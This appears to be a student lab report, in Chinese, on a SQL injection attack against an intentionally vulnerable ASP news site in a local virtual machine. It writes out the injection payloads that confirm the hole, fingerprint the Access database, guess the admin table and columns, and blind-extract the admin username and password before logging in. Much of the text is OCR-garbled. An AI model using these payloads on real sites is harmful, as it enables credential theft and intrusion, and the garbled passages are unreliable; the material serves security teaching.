SQL注入攻击实验报告剖析

1、实验报告实验名称：SQL注入攻击）- -一、实验目的通过SQL注入攻击，掌握网站的工作机制，认识到SQL注入攻击的防范措施，加强对Web攻击的防范。二、实验环境描述实验开展所基于的网络环境，给出网络拓扑、IP地址、web服务器、客户机等信息。宿主机（客户机）：操作系统为Windows10，IP为1，在主机上安装虚拟化软件VmwarePlayer，在此基础上创建虚拟机并安装操作系统，进行网络配置，采用环回适配器，桥接模式，实现宿主机与虚拟机之间的网络通信，虚拟机（Web服务器）：操作系统为WindowsXP，IP为，本实验利用windows的iis服务搭建了一个有SQL注入漏洞的网站“ASP新闻

2、发布系统”，以该网站为目标，对其实施SQL注入攻击。本实验所需工具如下：IIS是InternetInformationServer的缩写，是微软提供的Internet服务器软件，包括Web、FTP、Mail等服务器，也是目前常用的服务器软件。版本不限。“啊D”注入工具：对“MSSQL显错模式”、“MSSQL不显错模式”、“Access”等数据库都有很好的注入检测能力，内集“跨库查询”、“注入点扫描”、“管理入口检测”、“目录查看”等等于一身的注入工具包。“ASP新闻发布系统”0k3wv4.6源码。三、实验内容（一）配置实验环境，X首先选择网络适配器，安装环回适配器，在主机上安装VmwarePl

3、ayer，成功启动虚拟机。接着配置宿主机和虚拟机的IP，如图Internet协议版本4(TCP/IPv4)屋性常规O目施得ip使用下面的ip地址:子网掩码（U：默认网关如果网络支持此功能.则可以获取目躺派的IP设置。否则，你壽要从网络矣统管理员处获得适当的IP设豊。要注意的是，配置主机上的IP时，应该选择VMnet8，并且注意勾取Bridge网洛VMwareVirtualEthernetAdapterforVMnetflH?VMwar&BridgelProtocoI交料粗印机共孚V丄链路层拓扌卜翁现响应程序0丄Internet协议版本4(TCP/IFV4)基Microsoft网jg适配器家蹈传

4、送器协议*丄链路层拓扑翁现映肘器I/O驱动程序*1MicrosoftLLDP驭动稈序安装卸载U)然后，验证宿主机和虚拟机是否联通，结果显示连接成功。Ping具有32的回复：字节的回复：字节的回复：字节的回复：字节：WIND0WSsystem的Ping统计信息:数据包：已发送=4,已接收:WINDO1!1/Ssystem32hdwizWindows4仕10.0.105862015MicrosoftCorporati门保.留所有杈利口:WIND0WSsystem32ping1Ping1具有32字节的数据：1的回复：字节=32时间lmsTTL1的回复：字

5、节覩时间1话TTL1的回复：字节=空时间1砖TTL1的回复：字节切日寸间TTL1281281281的Ping统计信息:数据包：已发送=4,已接收=4,丢失=0(0%丢失),最短=0ms,最长=0ms,平均=0ms字节的数据：32时间=弧TTL32时间1磋TTL32时间TTL32时间1砖TTL128128128128-4,丢失=0(0%丢失),最短=0砖，最长=3itg,平均=0ms最后在虚拟机上安装IIS程序，打开浏览器，输入地址“”，检查网站搭建情况。成功!（二）寻找注入点在宿主机上，打开网页 HYPERLINK /list.asp?id=95,%e5%8f%af%e

6、4%bb%a5%e6%ad%a3%e5%b8%b8%e6%89%93%e5%bc%80 /list.asp?id=95,可以正常打开页面。进行注入测试，键入 HYPERLINK /list.asp?id=95 /list.asp?id=95and1=1，返回页面不变。键入 HYPERLINK /list.asp?id=95 /list.asp?id=95and1=2，返回页面出错。收藏网址导航三口一61X0 HYPERLINK /list.asp?id=95%20and%20(select%20count(*)%20from%20msysobject$ /list.asp?id=95%20an

7、d%20(select%20count(*)%20from%20msysobject$,ectcount(*)frommsysobjects)0Q36j#IxD无法显示网页OD（此为版式和体例设计）X，D计算机网络技术课*X/Q无法显示网页无法显示网页试图访问的网页出现问题，无法显示。请尝试执行下列操作：单击刷誣按钮，或稍后重试。打开主页，然后查找与所需信息相关的铤接。HTTP错误500.100-内部服务器错误-ASP错误Internet信息朋劳技术信息(用于支持人员)错误类型：MicrosoftJETDatabaseEngine(0 x80040E09)不能读取记录；在msysobjec上没

8、有读取数据权限。/list,asp,第15行浏览器类型：Mozilla/B.O(WindowsNT10.0;W0W64)AppleWebKit/537.36(KHTOL,likeGecko)Chrome/49.0.2623.22Saari/537.36SE2.XMet：aSr1.0网页：GET/Iist.amp时间：201612月F日.，15:24:59详细信息：t古持C3)aQ100%因此，可确定该网站存在注入点。判断数据库类型用系统表的方法进行判断，分别键入 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectcount(*)fromsys

9、objects)0 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectcount(*)frommsysobjects)0OD（此为版式和体例设计）XD计算机网络技术课雀xjD无法显示网页无法显示网頁+J0 HYPERLINK /list.asp?id=95%20and%20(select%20count(*)%20from420msysobject%c2%ab /list.asp?id=95%20and%20(select%20count(*)%20from420msysobjectI无法显示网页试图访问的网页出现问题，无法显示。请尝试执行下

10、列操作：单击趣按钮，或稍后重试。-打开19Z16&1&9主页，然后查拔与所需信息相关的钺接。HTTP错误500.100-内部朋务器错误-ASP错误Internet信息服务技术信息(用于支持人員)-错误类型：MicroeotJETDatabaseEngine(,0k80040E09.)不能读取记录；在，mSySobj；cts-上盪有读取数据权.限。/list,asp,第1弓行浏览器类型：Mozilli/S.O(WindowsNT10.0：W0W64)AppleWebKit/537.36fKKML.,likeGecko)CtLi-omeyMS.0.2623.22Sa：ai-i/537.36SE2.

11、XMet：iSr1.0网页：GET/Iist.：辽p时间：201612月7日.，15:24:59详细信息：AliGrQEoft吏扌寺IP完成http:ig2.16&18.g/li5t5p?id=g5%20and%20(5elect%20Hunt(*)%20frorr?&20sysobjects)s沪xVT合D（此为版卿休桶设计三D圧计算机网络技术课毛仝口亦显示网丈无法显示网页试囹访问的网页出现问题，无法显示。请尝试执行下列操作：单击施按钮，或稍后重试。打开192.1迢但9主页，然后查找与所需信息相关的铤接。HTTF错误500.100-内部服势器错误-ASF错误Internet信息服务技朮信息用

12、于支持人员)错误类型：MicrosoftJETHatabaseEngine(.0 x80040E37.)MicrosoftJet數据库引擎摂不到输入.克或查询I戸口。确定它是否存在，以阴它的名称的拼写是否正确:-/list,asp,第1弓行-浏览器类型：Moiilla/5.0(WindowsNT10.0;W0W64)AppleWebKit/537.36(KHTMLjlikeGecko)CtLi-ome/49.0.2623.22Sat：ii-i./537.36SE2.KMet：aSr1.0-网页：GET/list,asp-时间：201612月?日.，15:25:28详细信息：Hicircmft支

13、持两者返回均出错，可知是access数据库。|就猜测表名一般网站后台的管理员都默认在表admin中，我们先试一下，键入： HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectcount(*)fromadmin)0|httpq/W26&-189/listsRid=95開20ani%2(|(select%20count(*)%20from弘20admimoOf止导航D无法显示网Si+)会员入口帐号:oKovvASF新闻发布系统曲启醫十算机网络技术课于：i新闻资讯一文章分类_我白密码：登录逹册I站内搜索:返回页面正常，可知该网站后台数据库中存在着表名

14、为admin的表。猜测字段名不同公司网站有不同的字段名，但一般都有三个字段，分别记录ID号、用户名和密码，常用的字段名为：id，username，password。分别键入 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectcount(id)fromadmin)0 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectcount(username)fromadmin)0 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectcount(passwo

15、rd)fromadmin)0匕寻航口阳去显示网 HYPERLINK /list.asp?id=95%252Oand%252O(select%252Oc0%7c2(i2%5e%7cOfmrn%252Oadmini%3c%3ec /list.asp?id=95%2Oand%2O(select%2Oc0|2(i2|Ofmrn%2Oadminicf*甜)瞪计算机网络技术课卞新闻资讯戈章分类_我会员人口帐号:密码:|登录|注册I站內搜索:uKoWASF新闻发布系统w4G10 HYPERLINK /list,asp?id /list,asp?id=95%2Oand%2O(select%2Ocoult(pa

16、ssword)loi:r0m%2Oaclr佥上融D瑟稣网SH)x_D航十算机网络技术课毛匕/打新闻资讯一文章分类_我旺会员入口帐号:密码:登录注册|I站内搜索:UK0WASF新闻发布系统沁E三者返回均正常。可知，表admin中存在的三个字段：id,username，password。注：“username的截图损坏，但是返回正常，望教员通融。猜测管理员用户名和密码确定表admin中有几条记录，键入 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectcount(*)fromadmin)=1返回页面正常。可知，表admin只有一条记录。猜测用户名

17、长度，键入 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectlen(username)fromadmin)=1返回出错，继续键入 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectlen(username)fromadmin)=2返回出错，继续测试3/4/5O勺|0/192.16&.18.9/list.asp?id=95%20and%20(select%20len(us&rnanne%2&frDnn%20adnnin3盘收藏网址导航D植显示网OD（此为版掛mt创设计反计算机网络技术课毛仝口

18、无法显示网丈无法显示网页试图访i可的网页出现问题，无法显示。请養试执行下列操作：:謡豐鵲豐蹩記躺查找与所需信息相关的槌接。皿TF错误500.100-內部朋箸器错误-ASF错误Internet信息服箸|=|直到返回页面正确。测试到5的时候，返回正常。可知，用户名长度为5。猜测用户名内容，采用ASCII码分析法先猜测第1位，用二分法，键入 HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectcount(*)fromadminwhere(asc(mid(username,1,1)between30and125)0返回正确，进一步缩小范围between

19、70and100，between85and100，between90and100，=97。20from%20admin%20where(asc(mill(u5ername(1,1)between%2090%20and%20100)0帘址导航口赵显示网HS计）瞪计算机网络技术课f新闻资孔文章分类_那卜会员入口帐号:密码:登录注册I站內搜索:瓷计算机网络技术课f新闻资讯一交章分类_我会员入口帐号:0nd&ZOtselectZOcountt&Z&frDnnZOadnninZOwherea潯航口赵显示网可知第一个字符为a。依此类推，猜测之后的每一位字符，网站首页1新闻资讯1网络安全1网页制作1网站运营

20、1平面设计1网络细程1演示囲站AEF新闻发布?Sv4.6VKJWASF新闻发布系统识.E网站首页1新闻资讯1网络安全1网页制作1网站运营1平面设计1网络编程1演示网站0d%20(select%20count(*)%20from%20admin%2；H|re(asc(mid(username/2lI2)=1OO)o|审寻航口无法兮网合员入口帐号:赶十X-D机十算机网络技术耕课韭XyD新闻资讯一文章分类一我比旳口册帥网施榔醍邑N新嚴砂彰徨我孑会员入口帐号:B1I登录|注册站内搜索:U2WASP新闻发布系统沁网站首页1新闻资讯1网络安全1网页制作1网站运营1平面设计1网络编程1演示网站最后得到用户名

21、为admin。猜测密码，同理： HYPERLINK /list.asp?id=95 /list.asp?id=95and(selectlen(password)fromadmin)=6回y/list.asp?id=95?&20and%20(select%20l;n(password)%20from%20admin)=6lb导航匚无法羞示网会员入口帐号:密码:登录注册I站内搜索:段计）航十算机网络技术课i：F新闻资讯!_文章分类一我白UKJWASF新闻发布系统v4.E网站首页I新闻资讯|网络安全|网页制作I网站运营I平面设计|网络编程I演示网站所以密码为6位。9启1巳匚無20匚ount（*）贻2

22、&fom拓20日drnin贻20whEr已拓20贻（加匸口试卩加时6匚）口）“0|仔祐紅十算机网给技术器课隹D新闻资讯_交章分类我孑卜会员入口帐号:密码:登录注册I站内搜索:VKOW蕊F新闻发布系统5口I口J-JJhkJ/网站首页丨新闻资讯丨网络安全丨网页制作丨网站运营丨平面设计丨网络细程丨演示囲聲felect%20count(*)%2Qfronn%20adnnin%20where%20%2.寻航口无法辰示网赶十）炕十算机网络技术课r新闻资讯一袁章分类_我总卜会员入口帐号:密码:登录注册I站内搜索:kJKOW网站首页丨新闻资讯丨网络安全丨网页制作I网站运营丨平面设计丨网络编程丨演示朗站Hele

23、ct%Z0count(*)%2&fronn%20adnnin%20where%20%|0(asc(micl(passworcl,3.3)=51)olf盒.寻航口无法显示网社十）炕十算机网络技术课歪r新闻资讯_文章分类_我甘卜会员入口帐号:虧码:登录注册I站内搜索:F网站首页I新闻资讯I网络安全I网页制作I网站运营I平面设计I网络编程I演示网站UKOW幅F新闻发布系统皿0relect%20count(A)%2&fronn%Z0adnnin%20where%Z0%2|i(asc(nnicl(passworclH2H2ffi=50)0|1盒导航口无法显示网计炕十算机网络技术课隹:新闻资讯一文章分类_

24、我卜会员入口r网站首页I新闻资讯I网络安全I网页制作I网站运营I平面设计I网络编程I演示网站.W网瓷计算机网塔技术课隹r新闻埶一文章分类一我h下卜会员入口厂网站首页I新闻资讯I网络安全I网页制作I网站运营I平面设计I网络编程I演示网站最终得到密码为6位：123456。（七）寻找到后台管理窗口打开“啊D”软件，点击进入“管理入口检测”选项，点击“检测管理入口”，进行检测，如图：打开检测到的各网址，测试是否为管理入口。可知 HYPERLINK /admin/index.asp /admin/index.asp为管理入口，如图:0 HYPERLINK /admin/ad_login.asp /adm

25、in/ad_login.asp航无法显示网十）计算机网络技术课TC昔理長登陆嘗理员帐書理员密|序竝匸9544管理登陆濟除再来返回首页（八）登陆后台找到后台管理窗口， HYPERLINK /admin/ad_login.asp%ef%bc%8c%e7%94%a8%e5%88%9a%e5%88%9a%e5%be%97%e5%88%b0%e7%9a%84%e7%94%a8%e6%88%b7%e5%90%8d%e5%92%8c%e5%af%86%e7%a0%81%e7%99%bb%e9%99%86%ef%bc%8c%e5%90%8e /admin/ad_login.asp，用刚刚得到的用户名和密码登陆，后台登陆成功。四、实验结果及分析SQL注入攻击过程。1)判断Web环境是否可以SQL注入。如果URL仅是对网页的访问，不存在SQL注入问题，如： HYPERLINK /162414739931.shtml /16241